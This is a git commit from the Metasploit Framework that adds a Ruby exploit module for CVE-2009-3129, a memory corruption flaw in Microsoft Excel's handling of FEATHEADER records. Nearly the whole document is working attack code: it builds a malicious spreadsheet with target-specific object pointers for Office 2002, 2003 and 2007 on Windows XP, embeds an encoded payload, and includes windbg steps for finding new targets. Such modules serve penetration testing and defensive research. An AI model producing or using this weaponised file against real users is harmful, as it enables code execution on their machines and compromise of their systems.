add first exploit module using Rex::OLE (cve-2009-3129)
git-svn-id: file:///home/svn/framework3/trunk@8470 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
49b0e8a077
commit
f3c6b01bbd
|
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/ole'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability in the handling of the
|
||||
FEATHEADER record by Microsoft Excel. All versions prior to the MS09-067 patch
|
||||
are vulnerable.
|
||||
|
||||
NOTE: On some versions of Office, the user will need to dismiss a warning dialog
|
||||
prior to the payload executing.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Sean Larsson', # original discovery
|
||||
'jduck'
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE','2009-3129' ],
|
||||
[ 'OSVDB', '59860' ],
|
||||
[ 'MSB', 'MS09-067' ],
|
||||
[ 'BID', '36945' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true # no need
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
#
|
||||
# To find new targets, generate the file using the debug target and execute
|
||||
# the following in windbg:
|
||||
#
|
||||
# 0:000> s -b 0 L?-1 04 00 00 00 ee ff c0 da
|
||||
#
|
||||
# Use the largest number + 9 (should be in the 0x30xxxxxx range)
|
||||
#
|
||||
|
||||
# Office v10.6854.6845, excel.exe v10.0.6854.0
|
||||
[ 'Microsoft Office 2002 (XP) SP3 English on Windows XP SP3 English',
|
||||
{ 'ObjPtr' => 0x308082d0 }
|
||||
],
|
||||
|
||||
# Office v11.5612.5606, excel.exe v11.0.5612.0
|
||||
[ 'Microsoft Office 2003 SP0 English on Windows XP SP3 English',
|
||||
{ 'ObjPtr' => 0x3085d430 }
|
||||
],
|
||||
|
||||
# Office v12.0.6425.1000, excel.exe v12.0.6425.1000
|
||||
[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',
|
||||
{ 'ObjPtr' => 0x30f69018 }
|
||||
],
|
||||
|
||||
# crash on a deref path to heaven.
|
||||
[ 'Crash Target for Debugging',
|
||||
{ 'ObjPtr' => 0xdac0ffee }
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 10 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xls']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def add_record(tag, data=nil)
|
||||
ret = ""
|
||||
ret << Rex::OLE::Util.pack16(tag)
|
||||
data ||= ''
|
||||
ret << Rex::OLE::Util.pack16(data.length)
|
||||
ret << data
|
||||
ret
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# build the Workbook stream
|
||||
ptr1 = target['ObjPtr']
|
||||
ptr2 = ptr1 + 4
|
||||
ptr3 = ptr2 + 4
|
||||
ptr4 = ptr3 + 4
|
||||
|
||||
bofdata = ""
|
||||
bofdata << Rex::OLE::Util.pack16(0x0600)
|
||||
bofdata << Rex::OLE::Util.pack16(0x0005)
|
||||
bofdata << Rex::OLE::Util.pack16(0x1faa)
|
||||
bofdata << Rex::OLE::Util.pack16(0x07cd)
|
||||
bofdata << Rex::OLE::Util.pack32(0x000100c1)
|
||||
bofdata << Rex::OLE::Util.pack32(0x00000406)
|
||||
|
||||
feathdr = ""
|
||||
feathdr << Rex::OLE::Util.pack16(0x0867) # frt
|
||||
feathdr << "\x00" * (10)
|
||||
feathdr << Rex::OLE::Util.pack16(0x0004) # isf
|
||||
feathdr << "\x01" # reserved
|
||||
feathdr << Rex::OLE::Util.pack32(0x00000004) # cbHdrData
|
||||
feathdr << [ptr1].pack('V')
|
||||
feathdr << rand_text_alphanumeric(1) # alignment
|
||||
feathdr << [ptr2].pack('V')
|
||||
feathdr << [ptr3 - 0x28].pack('V')
|
||||
feathdr << [ptr4].pack('V')
|
||||
#feathdr << "\xcc"
|
||||
feathdr << payload.encoded
|
||||
|
||||
content = ""
|
||||
content << add_record(0x0809, bofdata)
|
||||
content << add_record(0x0867, feathdr)
|
||||
content << add_record(0x000a)
|
||||
|
||||
print_status("Creating Excel spreadsheet ...")
|
||||
|
||||
out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
|
||||
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
|
||||
if (not stg)
|
||||
raise RuntimeError, 'Unable to create output file'
|
||||
end
|
||||
stm = stg.create_stream("Workbook")
|
||||
if (not stm)
|
||||
raise RuntimeError, 'Unable to create workbook stream'
|
||||
end
|
||||
stm << content
|
||||
stm.close
|
||||
stg.close
|
||||
|
||||
print_status("Generated output file #{out}")
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
Loading…
Reference in New Issue